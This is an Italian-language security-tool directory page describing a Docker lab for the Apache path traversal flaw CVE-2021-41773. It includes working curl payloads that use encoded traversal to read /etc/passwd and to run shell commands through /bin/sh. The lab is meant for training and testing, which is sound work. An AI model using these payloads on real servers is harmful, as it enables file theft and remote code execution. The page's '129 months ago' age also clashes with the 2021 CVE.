Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41773S — # Laboratorio vulnerabile basato su Docker per CVE-2021-41773 Apache path traversal, che fornisce configurazioni PoC per la lettura di file e l'esecuzione remota di codice in un ambiente controllato. | Kitploit
Strumenti/GitHubGitHub/mightysai1997/cve-2021-41773s
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

# Laboratorio vulnerabile basato su Docker per CVE-2021-41773 Apache path traversal, che fornisce configurazioni PoC per la lettura di file e l'esecuzione remota di codice in un ambiente controllato.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
129 mesi faNon ancora revisionato

Immagini Docker vulnerabili per CVE-2021-41773 path traversal di Apache

Questa vulnerabilità si applica solo alla versione 2.4.49 con configurazioni specifiche non predefinite. In determinate situazioni può comportare la lettura di file o l'esecuzione di codice.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configurazione vulnerabile alla lettura di file

I container possono essere scaricati direttamente da Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

ed eseguiti usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

I log di Apache possono essere visualizzati usando il comando seguente, oppure basta escludere "-dit" dal comando di esecuzione sopra per trasmettere stdio docker logs <container-id>

PoC per la lettura di file

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configurazione vulnerabile all'esecuzione di codice (RCE)

I container possono essere scaricati direttamente da Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

ed eseguiti usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

I log di Apache possono essere visualizzati usando il comando seguente, oppure basta escludere "-dit" dal comando di esecuzione sopra per trasmettere stdio docker logs <container-id>

PoC per l'esecuzione di codice (RCE)

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Crea container Docker personalizzati

Modifica e crea le tue versioni usando i file dockerfile e i file template httpd.conf nelle sottodirectory

  • Usa ./no-cgi per la configurazione vulnerabile alla lettura di file
  • Usa ./with-cgi per la configurazione vulnerabile all'esecuzione di codice
Scarica lo strumento